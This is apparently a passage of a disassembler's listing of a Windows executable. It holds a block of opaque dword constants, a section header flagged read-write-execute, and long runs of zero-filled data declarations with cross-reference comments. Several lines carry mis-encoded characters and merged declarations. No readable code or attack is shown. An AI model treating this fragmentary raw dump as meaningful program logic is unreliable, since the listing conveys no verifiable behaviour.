dd 1BF0000h, 5FAB16EBh, 705E28B0h, 6C74735Ah, 1C00000h
dd 19E68998h, 0BF1F88DFh, 0D0A17047h, 0BF0000h, 0EBB3A24Ch
dd 357BB524h, 0B90097h, 0A8D09766h, 7FB4h, 39750131h, 7D813DB0h
dd 1438h, 0F3BE02ADh, 3D748F3Fh, 3B3614BCh, 57BB8249h
dd 0E85801D9h, 60B06568h, 4120h, 0F83B00B2h, 3205ECC5h
dd 60A2B351h, 0E962BEDh, 67A575F9h, 0BC2F22E7h, 0B30002h
dd 0AA2EA22h, 844E4F86h, 98E27E34h, 579EACC2h, 3D3B45A3h
dd 408E31h, 66A60106h, 381B153Bh, 0ADBB2ABAh, 0C6F27789h
dd 473ED513h, 73361h, 8C5F0108h, 0BA0B1833h, 5F1E5BDFh
dd 0BA49251Ch, 5EA56F5h, 0D561137h, 26D0000h, 4EDA820Fh
dd 40BF747Eh, 111A3E1Ch, 8C47h, 6C430152h, 2477D8C4h, 0B1F2C032h
dd 51B8h, 9D420115h, 2EAA2CD4h, 5227B88Fh, 15300D8h, 4A94A488h
dd 0B2997E5Bh, 1A8C549Ah, 3AA4h, 0B4100156h, 24602B6Dh
dd 0B38D685Ch, 6E03A671h, 28B0000h, 0DD45854Ah, 603BF634h
dd 1FEC55B0h, 8BF03DF6h, 0A315506Eh, 0FA6F0AA2h, 0B46DF0h
dd 38B701B5h, 1198A1D7h, 549086CEh, 4DDDh, 8CF701B2h, 0AAD0CD58h
dd 0FBD818B0h, 0A0CEh, 0E8A027Ch, 5E7754FCh, 3498B9F0h
dd 0E96h, 0A79200AAh, 2B09C9Eh, 0A2E89479h, 5D1B7D95h
dd 1A18h, 8E770261h, 10EE8BFEh, 8D2D6280h, 7FD3h, 0C5B00021h
dd 7613D3B3h, 0A2C499EDh, 2091ADF0h, 220000h, 6C460352h
dd 4872F60Eh, 5E49B40Bh, 0A4A1h, 0C90B0262h, 21F35B5Ah
dd 927BCED7h, 9708C13Eh, 468B87FEh, 0F60D4F29h, 5BCB0053h
dd 0B1ED4CC7h, 99441C75h, 9322h, 176h dup(0)
seg001 ends
; Section 3. (virtual address 0001E000)
; Virtual size : 00043000 ( 274432.)
; Section size in file : 00043000 ( 274432.)
; Offset to raw data for section: 0001E000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg002 segment para public 'CODE' use32
assume cs:seg002
;org 41E000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 0Ah dup(0)
dword_41E028 dd 2 dup(0) dword_41E030 dd 0 dword_41E034 dd 2 dup(0) dword_41E03C dd 0 dword_41E040 dd 1Ch dup(0) dword_41E0B0 dd 3 dup(0) dword_41E0BC dd 3 dup(0) dword_41E0C8 dd 42h dup(0) dword_41E1D0 dd 13h dup(0) dword_41E21C dd 12h dup(0) dword_41E264 dd 0Fh dup(0) dword_41E2A0 dd 0Ch dup(0) dword_41E2D0 dd 19h dup(0) dword_41E334 dd 19h dup(0) dword_41E398 dd 2 dup(0) ; seg000:0040B618�o
dword_41E3A0 dd 0 ; seg000:0040B601�o
dword_41E3A4 dd 0 ; seg000:0040B5E9�o
dword_41E3A8 dd 0Dh dup(0) dword_41E3DC dd 13h dup(0) dword_41E428 dd 288h dup(0) dword_41EE48 dd 2 dup(0) ; seg000:0040CB04�o ...
dword_41EE50 dd 3 dup(0) dword_41EE5C dd 2 dup(0) dword_41EE64 dd 0 dword_41EE68 dd 2 dup(0) dword_41EE70 dd 22h dup(0) dword_41EEF8 dd 0Ch dup(0) dword_41EF28 dd 3 dup(0) dword_41EF34 dd 13h dup(0) byte_41EF80 db 0 ; DATA XREF: sub_402930+107�r
align 4
dd 10h dup(0)
dword_41EFC4 dd 5Ah dup(0) dword_41F12C dd 24h dup(0) dword_41F1BC dd 0 ; seg000:00409B10�o
dword_41F1C0 dd 0 dword_41F1C4 dd 3 dup(0) dword_41F1D0 dd 0 dword_41F1D4 dd 0 dword_41F1D8 dd 0 dword_41F1DC dd 2 dup(0) dword_41F1E4 dd 3 dup(0) dword_41F1F0 dd 3 dup(0) dword_41F1FC dd 72h dup(0) dword_41F3C4 dd 7 dup(0) dword_41F3E0 dd 2 dup(0) ; seg000:004098B2�o
dword_41F3E8 dd 9 dup(0) dword_41F40C dd 18h dup(0) dword_41F46C dd 6 dup(0) dword_41F484 dd 0Bh dup(0) dword_41F4B0 dd 2 dup(0) dword_41F4B8 dd 8 dup(0) dword_41F4D8 dd 3 dup(0) dword_41F4E4 dd 2 dup(0) dword_41F4EC dd 0Ah dup(0) dword_41F514 dd 2 dup(0) dword_41F51C dd 6 dup(0) dword_41F534 dd 2 dup(0) dword_41F53C dd 0Bh dup(0) dword_41F568 dd 2 dup(0) dword_41F570 dd 5 dup(0) dword_41F584 dd 0 dword_41F588 dd 5 dup(0) dword_41F59C dd 0 dword_41F5A0 dd 2 dup(0) ; sub_40318D+361�o
dword_41F5A8 dd 8 dup(0) dword_41F5C8 dd 0 dword_41F5CC dd 5 dup(0) dword_41F5E0 dd 2 dup(0) dword_41F5E8 dd 4 dup(0) dword_41F5F8 dd 2 dup(0) dword_41F600 dd 6 dup(0) dword_41F618 dd 2 dup(0) dword_41F620 dd 6 dup(0) dword_41F638 dd 2 dup(0) dword_41F640 dd 2 dup(0) dword_41F648 dd 6 dup(0) dword_41F660 dd 0 ; seg000:00404AF0�o ...
dword_41F664 dd 12h dup(0) dword_41F6AC dd 0 dword_41F6B0 dd 0 ; seg000:00409438�o ...
dword_41F6B4 dd 2 dup(0) dword_41F6BC dd 3Ch dup(0) dword_41F7AC dd 37h dup(0) dword_41F888 dd 3 dup(0) ; sub_40799C+1AE�o
dword_41F894 dd 5 dup(0) dword_41F8A8 dd 7 dup(0) dword_41F8C4 dd 3 dup(0) dword_41F8D0 dd 13h dup(0) dword_41F91C dd 11h dup(0) dword_41F960 dd 0 dword_41F964 dd 0 ; sub_404134+29�o
dword_41F968 dd 2 dup(0) ; sub_404134+4CA�o
dword_41F970 dd 0 ; seg000:0040AA8E�o ...
dword_41F974 dd 0 dword_41F978 dd 0Ah dup(0) dword_41F9A0 dd 12h dup(0) dword_41F9E8 dd 0Ch dup(0) dword_41FA18 dd 7 dup(0) dword_41FA34 dd 1Ah dup(0) dword_41FA9C dd 6 dup(0) dword_41FAB4 dd 8 dup(0) dword_41FAD4 dd 0Ah dup(0) dword_41FAFC dd 4 dup(0) dword_41FB0C dd 1Ah dup(0) dword_41FB74 dd 6 dup(0) dword_41FB8C dd 8 dup(0) dword_41FBAC dd 2 dup(0) dword_41FBB4 dd 8 dup(0) ; sub_404134+486�o
dword_41FBD4 dd 7 dup(0) dword_41FBF0 dd 2 dup(0) ; sub_404134+413�o
dword_41FBF8 dd 8 dup(0) dword_41FC18 dd 0 dword_41FC1C dd 0 dword_41FC20 dd 0 dword_41FC24 dd 0 dword_41FC28 dd 15h dup(0) dword_41FC7C dd 5 dup(0) dword_41FC90 dd 0Bh dup(0) dword_41FCBC dd 27h dup(0) dword_41FD58 dd 0Bh dup(0) dword_41FD84 dd 10h dup(0) dword_41FDC4 dd 8 dup(0) dword_41FDE4 dd 4Eh dup(0) dword_41FF1C dd 14h dup(0) dword_41FF6C dd 12h dup(0) dword_41FFB4 dd 3 dup(0) dword_41FFC0 dd 2 dup(0) db 2 dup(0)
word_41FFCA dw 0 ; DATA XREF: seg000:00402D55�o
dd 7 dup(0)
dword_41FFE8 dd 0 ; seg000:0040BA75�r ...
dword_41FFEC dd 0 dword_41FFF0 dd 0 ; seg000:00402D8F�r ...
dword_41FFF4 dd 0 dword_41FFF8 dd 0 dd 21h dup(0)
db 2 dup(0)
byte_420082 db 0 ; DATA XREF: seg000:loc_40D384�r
; seg000:0040D38E�o
align 4
dd 6 dup(0)
dword_42009C dd 5 dup(0) dword_4200B0 dd 3 dup(0) dword_4200BC dd 0Eh dup(0) dword_4200F4 dd 0Dh dup(0) dword_420128 dd 0Dh dup(0) dword_42015C dd 12h dup(0) dword_4201A4 dd 14h dup(0) ; seg000:0040D8DA�o
dword_4201F4 dd 11h dup(0) dword_420238 dd 15h dup(0) dword_42028C dd 12h dup(0) dword_4202D4 dd 15h dup(0) ; seg000:0040D764�o
dword_420328 dd 3 dup(0) ; sub_407435+46�o
dword_420334 dd 0Fh dup(0) dword_420370 dd 14h dup(0) dword_4203C0 dd 16h dup(0) dword_420418 dd 14h dup(0) dword_420468 dd 13h dup(0) dword_4204B4 dd 13h dup(0) dword_420500 dd 14h dup(0) dword_420550 dd 16h dup(0) dword_4205A8 dd 15h dup(0) dword_4205FC dd 16h dup(0) dword_420654 dd 4 dup(0) dword_420664 dd 4 dup(0) dword_420674 dd 4 dup(0) dword_420684 dd 4 dup(0) dword_420694 dd 4 dup(0) dword_4206A4 dd 5 dup(0) dword_4206B8 dd 3 dup(0) dword_4206C4 dd 4 dup(0) dword_4206D4 dd 4 dup(0) dword_4206E4 dd 3 dup(0) dword_4206F0 dd 6 dup(0) dword_420708 dd 6 dup(0) dword_420720 dd 5 dup(0) dword_420734 dd 5 dup(0) dword_420748 dd 2 dup(0) dword_420750 dd 5 dup(0) dword_420764 dd 4 dup(0) dword_420774 dd 4 dup(0) dword_420784 dd 8 dup(0) dword_4207A4 dd 6 dup(0) dword_4207BC dd 3 dup(0) dword_4207C8 dd 6 dup(0) dword_4207E0 dd 4 dup(0) dword_4207F0 dd 3 dup(0) dword_4207FC dd 3 dup(0) dword_420808 dd 3 dup(0) dword_420814 dd 4 dup(0) dword_420824 dd 5 dup(0) dword_420838 dd 5 dup(0) dword_42084C dd 4 dup(0) dword_42085C dd 3 dup(0) dword_420868 dd 3 dup(0) dword_420874 dd 4 dup(0) dword_420884 dd 4 dup(0) dword_420894 dd 4 dup(0) dword_4208A4 dd 4 dup(0) dword_4208B4 dd 3 dup(0) dword_4208C0 dd 7 dup(0) dword_4208DC dd 5 dup(0) dword_4208F0 dd 5 dup(0) dword_420904 dd 5 dup(0) dword_420918 dd 5 dup(0) dword_42092C dd 4 dup(0) dword_42093C dd 5 dup(0) dword_420950 dd 5 dup(0) dword_420964 dd 5 dup(0) dword_420978 dd 7 dup(0) dword_420994 dd 7 dup(0) dword_4209B0 dd 3 dup(0) dword_4209BC dd 3 dup(0) dword_4209C8 dd 3 dup(0) dword_4209D4 dd 4 dup(0) dword_4209E4 dd 4 dup(0) dword_4209F4 dd 3 dup(0) dword_420A00 dd 3 dup(0) dword_420A0C dd 3 dup(0) dword_420A18 dd 2 dup(0) dword_420A20 dd 2 dup(0) dword_420A28 dd 2 dup(0) dword_420A30 dd 2 dup(0) dword_420A38 dd 3 dup(0) dword_420A44 dd 2 dup(0) dword_420A4C dd 2 dup(0) dword_420A54 dd 2 dup(0) ; seg000:0040AC53�o
dword_420A5C dd 2 dup(0) dword_420A64 dd 2 dup(0) dword_420A6C dd 2 dup(0) dword_420A74 dd 2 dup(0) dword_420A7C dd 3 dup(0) dword_420A88 dd 3 dup(0) dword_420A94 dd 2 dup(0) dword_420A9C dd 3 dup(0) dword_420AA8 dd 2 dup(0) dword_420AB0 dd 3 dup(0) dword_420ABC dd 4 dup(0) dword_420ACC dd 3 dup(0) dword_420AD8 dd 4 dup(0) dword_420AE8 dd 4 dup(0) dword_420AF8 dd 3 dup(0) dword_420B04 dd 3 dup(0) dword_420B10 dd 3 dup(0) dword_420B1C dd 4 dup(0) dword_420B2C dd 3 dup(0) dword_420B38 dd 2 dup(0) dword_420B40 dd 4 dup(0) dword_420B50 dd 5 dup(0) dword_420B64 dd 4 dup(0) dword_420B74 dd 5 dup(0) dword_420B88 dd 5 dup(0) dword_420B9C dd 3 dup(0) dword_420BA8 dd 3 dup(0) dword_420BB4 dd 4 dup(0) dword_420BC4 dd 7 dup(0) dword_420BE0 dd 5 dup(0) dword_420BF4 dd 5 dup(0) dword_420C08 dd 4 dup(0) dword_420C18 dd 4 dup(0) dword_420C28 dd 4 dup(0) dword_420C38 dd 4 dup(0) dword_420C48 dd 4 dup(0) dword_420C58 dd 6 dup(0) dword_420C70 dd 6 dup(0) dword_420C88 dd 5 dup(0) dword_420C9C dd 3 dup(0) dword_420CA8 dd 4 dup(0) dword_420CB8 dd 5 dup(0) dword_420CCC dd 4 dup(0) dword_420CDC dd 4 dup(0) dword_420CEC dd 4 dup(0) dword_420CFC dd 4 dup(0) dword_420D0C dd 4 dup(0) dword_420D1C dd 4 dup(0) dword_420D2C dd 5 dup(0) dword_420D40 dd 4 dup(0) dword_420D50 dd 4 dup(0) dword_420D60 dd 3 dup(0) dword_420D6C dd 3 dup(0) dword_420D78 dd 4 dup(0) dword_420D88 dd 3 dup(0) ; sub_4195E1+D�o
dword_420D94 dd 6 dup(0) dword_420DAC dd 7 dup(0) dword_420DC8 dd 6 dup(0) dword_420DE0 dd 3 dup(0) dword_420DEC dd 4 dup(0) dword_420DFC dd 6 dup(0) dword_420E14 dd 5 dup(0) dword_420E28 dd 4 dup(0) dword_420E38 dd 4 dup(0) dword_420E48 dd 4 dup(0) dword_420E58 dd 7 dup(0) dword_420E74 dd 4 dup(0) dword_420E84 dd 4 dup(0) dword_420E94 dd 0Dh dup(0) dword_420EC8 dd 6 dup(0) dword_420EE0 dd 7 dup(0) dword_420EFC dd 6 dup(0) dword_420F14 dd 7 dup(0) dword_420F30 dd 6 dup(0) dword_420F48 dd 7 dup(0) dword_420F64 dd 6 dup(0) dword_420F7C dd 7 dup(0) dword_420F98 dd 6 dup(0) dword_420FB0 dd 6 dup(0) dword_420FC8 dd 7 dup(0) dword_420FE4 dd 6 dup(0) dword_420FFC dd 0Ch dup(0) dword_42102C dd 2 dup(0) ; sub_40F9AB+18�o
dword_421034 dd 4 dup(0) dword_421044 dd 0Bh dup(0) dword_421070 dd 11h dup(0) dword_4210B4 dd 3 dup(0) dword_4210C0 dd 3 dup(0) dword_4210CC dd 5C2h dup(0) dword_4227D4 dd 11h dup(0) dword_422818 dd 11h dup(0) dword_42285C dd 0Eh dup(0) dword_422894 dd 11h dup(0) dword_4228D8 dd 10h dup(0) dword_422918 dd 0Fh dup(0) dword_422954 dd 10h dup(0) dword_422994 dd 0Fh dup(0) dword_4229D0 dd 3 dup(0) dword_4229DC dd 36h dup(0) dword_422AB4 dd 3 dup(0) dword_422AC0 dd 6 dup(0) word_422AD8 dw 0 ; DATA XREF: sub_40799C:loc_407A9E�r
; sub_4086FA+1F�o
align 4
dword_422ADC dd 2 dup(0) dword_422AE4 dd 0 ; seg000:loc_40F95C�o
dword_422AE8 dd 2 dup(0) dword_422AF0 dd 0 ; seg000:0040F947�o
dword_422AF4 dd 0 ; seg000:0040F937�o
dword_422AF8 dd 0 ; seg000:0040F91E�o
dword_422AFC dd 0 ; seg000:0040F90E�o
dword_422B00 dd 0 ; seg000:0040F8FE�o
dword_422B04 dd 0 ; seg000:0040F8F0�o
dword_422B08 dd 10h dup(0) dword_422B48 dd 0 dword_422B4C dd 0 dword_422B50 dd 2 dup(0) dword_422B58 dd 4 dup(0) dword_422B68 dd 3 dup(0) dword_422B74 dd 4 dup(0) dword_422B84 dd 9 dup(0) dword_422BA8 dd 0Eh dup(0) dword_422BE0 dd 0Ch dup(0) dword_422C10 dd 0Ah dup(0) dword_422C38 dd 0 align 10h
dword_422C40 dd 6 dup(0) dword_422C58 dd 44h dup(0) ; seg000:004085E5�o
dword_422D68 dd 5Ah dup(0) ; seg000:0040D109�o
dword_422ED0 dd 0Fh dup(0) dword_422F0C dd 2 dup(0) ; sub_40EC42+104�o
dword_422F14 dd 2 dup(0) dword_422F1C dd 2 dup(0) dword_422F24 dd 2 dup(0) dword_422F2C dd 2 dup(0) dword_422F34 dd 0 dword_422F38 dd 2 dup(0) ; sub_4088A6+3B�o
dword_422F40 dd 2 dup(0) dword_422F48 dd 14h dup(0) dword_422F98 dd 14h dup(0) dword_422FE8 dd 0 dword_422FEC dd 0 ; sub_4089FD+620�r
dword_422FF0 dd 0 align 8
dword_422FF8 dd 0 ; seg000:0040D70A�r
dword_422FFC dd 0 ; seg000:loc_40D7FC�r
dword_423000 dd 0 dword_423004 dd 0 dword_423008 dd 0 ; sub_4089FD+434�o
byte_42300C db 0 ; DATA XREF: seg000:loc_408650�r
; seg000:00409A44�r ...
align 10h
dword_423010 dd 0 ; seg000:0040F734�r ...
dword_423014 dd 0 ; seg000:0040960C�r ...
dword_423018 dd 7 dup(0) ; seg000:0040C72A�o ...
dword_423034 dd 0 ; seg000:0040E26B�o
dword_423038 dd 3 dup(0) ; sub_4089FD+611�o
dword_423044 dd 0 ; sub_4089FD+627�o
dword_423048 dd 2 dup(0) ; sub_4089FD+639�o
byte_423050 db 0 ; DATA XREF: sub_4089FD:loc_40904C�r
; sub_4089FD+65D�o
align 4
dd 2 dup(0)
dword_42305C dd 0 dword_423060 dd 2 dup(0) byte_423068 db 0 ; DATA XREF: seg000:00402BCB�o
; seg000:00405062�o ...
align 4
dd 7 dup(0)
dword_423088 dd 3 dup(0) dword_423094 dd 6 dup(0) dword_4230AC dd 2 dup(0) dword_4230B4 dd 9 dup(0) ; seg000:0040D554�o ...
dword_4230D8 dd 0 dword_4230DC dd 0 ; seg000:0040E202�o
dd 1Ah dup(0)
dword_423148 dd 6 dup(0) dword_423160 dd 92Fh dup(0) dword_42561C dd 0 ; seg000:00409AA8�r ...
dd 56h dup(0)
dword_425778 dd 26Eh dup(0) dword_426130 dd 4 dup(0) dword_426140 dd 39h dup(0) dword_426224 dd 0Eh dup(0) dword_42625C dd 348h dup(0) ; seg000:0040E16E�o
dword_426F7C dd 870h dup(0) dword_42913C dd 39Eh dup(0) dword_429FB4 dd 9 dup(0) dword_429FD8 dd 14h dup(0) dword_42A028 dd 0Fh dup(0) dword_42A064 dd 14h dup(0) dword_42A0B4 dd 10h dup(0) dword_42A0F4 dd 0Eh dup(0) dword_42A12C dd 2 dup(0) dword_42A134 dd 0Ch dup(0) dword_42A164 dd 7 dup(0) dword_42A180 dd 3 dup(0) dword_42A18C dd 4 dup(0) dword_42A19C dd 4 dup(0) dword_42A1AC dd 0Dh dup(0) dword_42A1E0 dd 0Dh dup(0) dword_42A214 dd 10h dup(0) dword_42A254 dd 10h dup(0) dword_42A294 dd 9 dup(0) ; seg000:0040E22E�o
dword_42A2B8 dd 0Ah dup(0) ; seg000:0040E21A�o
dword_42A2E0 dd 0 dword_42A2E4 dd 0Eh dup(0) dword_42A31C dd 10h dup(0) dword_42A35C dd 10h dup(0) dword_42A39C dd 3 dup(0) dword_42A3A8 dd 4 dup(0) dword_42A3B8 dd 0Bh dup(0) dword_42A3E4 dd 6 dup(0) dword_42A3FC dd 0Ch dup(0) dword_42A42C dd 6 dup(0) dword_42A444 dd 3 dup(0) dword_42A450 dd 10h dup(0) dword_42A490 dd 0Bh dup(0) dword_42A4BC dd 13h dup(0) dword_42A508 dd 0Ch dup(0) dword_42A538 dd 0 dword_42A53C dd 0Bh dup(0) dword_42A568 dd 13h dup(0) dword_42A5B4 dd 0Bh dup(0) dword_42A5E0 dd 0Bh dup(0) dword_42A60C dd 0Bh dup(0) dword_42A638 dd 0Bh dup(0) dword_42A664 dd 14h dup(0) dword_42A6B4 dd 0Dh dup(0) dword_42A6E8 dd 2 dup(0) dword_42A6F0 dd 0Dh dup(0) dword_42A724 dd 0Bh dup(0) dword_42A750 dd 0Ch dup(0) dword_42A780 dd 5 dup(0) dword_42A794 dd 10h dup(0) dword_42A7D4 dd 0Eh dup(0) dword_42A80C dd 10h dup(0) dword_42A84C dd 10h dup(0) dword_42A88C dd 0Eh dup(0) dword_42A8C4 dd 13h dup(0) dword_42A910 dd 13h dup(0) dword_42A95C dd 0Dh dup(0) dword_42A990 dd 13h dup(0) dword_42A9DC dd 1Fh dup(0) dword_42AA58 dd 0Eh dup(0) dword_42AA90 dd 0Dh dup(0) dword_42AAC4 dd 0Dh dup(0) dword_42AAF8 dd 0Bh dup(0) dword_42AB24 dd 10h dup(0) dword_42AB64 dd 0Eh dup(0) dword_42AB9C dd 0Fh dup(0) dword_42ABD8 dd 0Fh dup(0) dword_42AC14 dd 0 dword_42AC18 dd 4 dup(0) ; seg000:loc_40DF8D�o
dword_42AC28 dd 0Eh dup(0) dword_42AC60 dd 0Eh dup(0) dword_42AC98 dd 0Ch dup(0) dword_42ACC8 dd 0Eh dup(0) dword_42AD00 dd 0Fh dup(0) dword_42AD3C dd 0Ch dup(0) dword_42AD6C dd 11h dup(0) dword_42ADB0 dd 0Eh dup(0) dword_42ADE8 dd 12h dup(0) dword_42AE30 dd 1Ah dup(0) dword_42AE98 dd 0Ah dup(0) dword_42AEC0 dd 0Ch dup(0) dword_42AEF0 dd 0Ch dup(0) dword_42AF20 dd 0Dh dup(0) dword_42AF54 dd 0Eh dup(0) dword_42AF8C dd 0 dword_42AF90 dd 0Bh dup(0) dword_42AFBC dd 11h dup(0) dword_42B000 dd 0Eh dup(0) dword_42B038 dd 0Ch dup(0) dword_42B068 dd 0Ch dup(0) dword_42B098 dd 0Ch dup(0) dword_42B0C8 dd 0Ah dup(0) dword_42B0F0 dd 3 dup(0) ; seg000:0040D32E�o
dword_42B0FC dd 0Ch dup(0) dword_42B12C dd 3 dup(0) dword_42B138 dd 0Ch dup(0) dword_42B168 dd 0Ch dup(0) dword_42B198 dd 2 dup(0) dword_42B1A0 dd 0Ch dup(0) dword_42B1D0 dd 2 dup(0) ; seg000:0040D178�o
dword_42B1D8 dd 3 dup(0) dword_42B1E4 dd 2 dup(0) dword_42B1EC dd 12h dup(0) dword_42B234 dd 0Bh dup(0) dword_42B260 dd 2 dup(0) dword_42B268 dd 0Ah dup(0) dword_42B290 dd 4 dup(0) ; seg000:0040C9D9�o ...
dword_42B2A0 dd 16h dup(0) dword_42B2F8 dd 14h dup(0) dword_42B348 dd 10h dup(0) dword_42B388 dd 3 dup(0) dword_42B394 dd 0Bh dup(0) dword_42B3C0 dd 0Eh dup(0) dword_42B3F8 dd 8 dup(0) dword_42B418 dd 0Eh dup(0) dword_42B450 dd 13h dup(0) dword_42B49C dd 13h dup(0) dword_42B4E8 dd 10h dup(0) dword_42B528 dd 13h dup(0) dword_42B574 dd 11h dup(0) dword_42B5B8 dd 13h dup(0) dword_42B604 dd 11h dup(0) dword_42B648 dd 13h dup(0) dword_42B694 dd 10h dup(0) dword_42B6D4 dd 15h dup(0) dword_42B728 dd 10h dup(0) dword_42B768 dd 15h dup(0) dword_42B7BC dd 14h dup(0) dword_42B80C dd 14h dup(0) dword_42B85C dd 14h dup(0) dword_42B8AC dd 4 dup(0) dword_42B8BC dd 4 dup(0) dword_42B8CC dd 3 dup(0) ; seg000:0040CCFB�o
dword_42B8D8 dd 13h dup(0) ; seg000:0040D62B�o
dword_42B924 dd 1Eh dup(0) dword_42B99C dd 3 dup(0) ; seg000:0040D58F�o
dword_42B9A8 dd 2 dup(0) ; seg000:0040D588�o
dword_42B9B0 dd 13h dup(0) dword_42B9FC dd 15h dup(0) ; seg000:0040D3D3�o
dword_42BA50 dd 13h dup(0) dword_42BA9C dd 17h dup(0) dword_42BAF8 dd 6 dup(0) dword_42BB10 dd 13h dup(0) dword_42BB5C dd 17h dup(0) dword_42BBB8 dd 13h dup(0) dword_42BC04 dd 13h dup(0) dword_42BC50 dd 12h dup(0) dword_42BC98 dd 2 dup(0) dword_42BCA0 dd 2 dup(0) dword_42BCA8 dd 0Fh dup(0) dword_42BCE4 dd 10h dup(0) dword_42BD24 dd 0Eh dup(0) dword_42BD5C dd 2 dup(0) dword_42BD64 dd 2 dup(0) dword_42BD6C dd 9 dup(0) dword_42BD90 dd 0 dword_42BD94 dd 4 dup(0) dword_42BDA4 dd 0Dh dup(0) dword_42BDD8 dd 3 dup(0) dword_42BDE4 dd 3 dup(0) dword_42BDF0 dd 4 dup(0) dword_42BE00 dd 11h dup(0) dword_42BE44 dd 13h dup(0) dword_42BE90 dd 0 dword_42BE94 dd 3 dup(0) dword_42BEA0 dd 0 dword_42BEA4 dd 4 dup(0) dword_42BEB4 dd 0 dword_42BEB8 dd 3 dup(0) dword_42BEC4 dd 4 dup(0) dword_42BED4 dd 0 dword_42BED8 dd 3 dup(0) dword_42BEE4 dd 4 dup(0) dword_42BEF4 dd 3 dup(0) dword_42BF00 dd 3 dup(0) dword_42BF0C dd 4 dup(0) dword_42BF1C dd 3 dup(0) dword_42BF28 dd 4 dup(0) dword_42BF38 dd 2 dup(0) dword_42BF40 dd 4 dup(0) dword_42BF50 dd 4 dup(0) dword_42BF60 dd 5 dup(0) dword_42BF74 dd 0 dword_42BF78 dd 3 dup(0) dword_42BF84 dd 0 dword_42BF88 dd 4 dup(0) dword_42BF98 dd 2 dup(0) dword_42BFA0 dd 2 dup(0) dword_42BFA8 dd 2 dup(0) dword_42BFB0 dd 3 dup(0) dword_42BFBC dd 3 dup(0) dword_42BFC8 dd 2 dup(0) dword_42BFD0 dd 3 dup(0) dword_42BFDC dd 2 dup(0) dword_42BFE4 dd 3 dup(0) dword_42BFF0 dd 2 dup(0) dword_42BFF8 dd 3 dup(0) dword_42C004 dd 4 dup(0) dword_42C014 dd 4 dup(0) dword_42C024 dd 2 dup(0) dword_42C02C dd 3 dup(0) dword_42C038 dd 2 dup(0) dword_42C040 dd 3 dup(0) dword_42C04C dd 2 dup(0) dword_42C054 dd 3 dup(0) dword_42C060 dd 2 dup(0) dword_42C068 dd 3 dup(0) dword_42C074 dd 3 dup(0) dword_42C080 dd 3 dup(0) dword_42C08C dd 2 dup(0) dword_42C094 dd 3 dup(0) dword_42C0A0 dd 3 dup(0) dword_42C0AC dd 3 dup(0) dword_42C0B8 dd 2 dup(0) dword_42C0C0 dd 3 dup(0) dword_42C0CC dd 2 dup(0) dword_42C0D4 dd 3 dup(0) dword_42C0E0 dd 2 dup(0) dword_42C0E8 dd 3 dup(0) dword_42C0F4 dd 2 dup(0) dword_42C0FC dd 3 dup(0) dword_42C108 dd 2 dup(0) dword_42C110 dd 4 dup(0) dword_42C120 dd 2 dup(0) dword_42C128 dd 3 dup(0) dword_42C134 dd 0Ch dup(0) dword_42C164 dd 0Dh dup(0) dword_42C198 dd 0Ch dup(0) dword_42C1C8 dd 0Dh dup(0) dword_42C1FC dd 2 dup(0) dword_42C204 dd 0Dh dup(0) dword_42C238 dd 0Dh dup(0) dword_42C26C dd 2 dup(0) dword_42C274 dd 2 dup(0) dword_42C27C dd 2 dup(0) dword_42C284 dd 2 dup(0) dword_42C28C dd 0Dh dup(0) dword_42C2C0 dd 0Eh dup(0) dword_42C2F8 dd 13h dup(0) dword_42C344 dd 2 dup(0) dword_42C34C dd 2 dup(0) dword_42C354 dd 4 dup(0) dword_42C364 dd 3 dup(0) ; seg000:0040A9CC�o
dword_42C370 dd 2 dup(0) dword_42C378 dd 4 dup(0) dword_42C388 dd 2 dup(0) dword_42C390 dd 3 dup(0) dword_42C39C dd 3 dup(0) dword_42C3A8 dd 4 dup(0) dword_42C3B8 dd 2 dup(0) dword_42C3C0 dd 5 dup(0) dword_42C3D4 dd 2 dup(0) dword_42C3DC dd 2 dup(0) dword_42C3E4 dd 2 dup(0) dword_42C3EC dd 4 dup(0) dword_42C3FC dd 2 dup(0) dword_42C404 dd 3 dup(0) dword_42C410 dd 2 dup(0) dword_42C418 dd 3 dup(0) dword_42C424 dd 3 dup(0) dword_42C430 dd 4 dup(0) dword_42C440 dd 2 dup(0) dword_42C448 dd 3 dup(0) dword_42C454 dd 3 dup(0) dword_42C460 dd 4 dup(0) dword_42C470 dd 2 dup(0) dword_42C478 dd 2 dup(0) dword_42C480 dd 2 dup(0) dword_42C488 dd 3 dup(0) dword_42C494 dd 2 dup(0) dword_42C49C dd 3 dup(0) dword_42C4A8 dd 2 dup(0) dword_42C4B0 dd 3 dup(0) dword_42C4BC dd 2 dup(0) dword_42C4C4 dd 5 dup(0) dword_42C4D8 dd 4 dup(0) dword_42C4E8 dd 4 dup(0) dword_42C4F8 dd 4 dup(0) dword_42C508 dd 4 dup(0) dword_42C518 dd 3 dup(0) dword_42C524 dd 4 dup(0) dword_42C534 dd 3 dup(0) dword_42C540 dd 4 dup(0) dword_42C550 dd 3 dup(0) dword_42C55C dd 4 dup(0) dword_42C56C dd 2 dup(0) dword_42C574 dd 3 dup(0) dword_42C580 dd 0Dh dup(0) dword_42C5B4 dd 2 dup(0) dword_42C5BC dd 2 dup(0) dword_42C5C4 dd 4 dup(0) dword_42C5D4 dd 2 dup(0) dword_42C5DC dd 2 dup(0) dword_42C5E4 dd 4 dup(0) dword_42C5F4 dd 2 dup(0) dword_42C5FC dd 4 dup(0) dword_42C60C dd 2 dup(0) dword_42C614 dd 3 dup(0) dword_42C620 dd 2 dup(0) dword_42C628 dd 3 dup(0) dword_42C634 dd 2 dup(0) dword_42C63C dd 3 dup(0) dword_42C648 dd 2 dup(0) dword_42C650 dd 3 dup(0) dword_42C65C dd 2 dup(0) dword_42C664 dd 3 dup(0) dword_42C670 dd 3 dup(0) dword_42C67C dd 4 dup(0) dword_42C68C dd 2 dup(0) dword_42C694 dd 2 dup(0) dword_42C69C dd 2 dup(0) dword_42C6A4 dd 3 dup(0) dword_42C6B0 dd 3 dup(0) dword_42C6BC dd 4 dup(0) dword_42C6CC dd 0Eh dup(0) dword_42C704 dd 0Ch dup(0) dword_42C734 dd 3 dup(0) dword_42C740 dd 2 dup(0) dword_42C748 dd 2 dup(0) dword_42C750 dd 2 dup(0) dword_42C758 dd 3 dup(0) dword_42C764 dd 3 dup(0) dword_42C770 dd 4 dup(0) dword_42C780 dd 2 dup(0) dword_42C788 dd 3 dup(0) dword_42C794 dd 2 dup(0) dword_42C79C dd 3 dup(0) dword_42C7A8 dd 2 dup(0) dword_42C7B0 dd 3 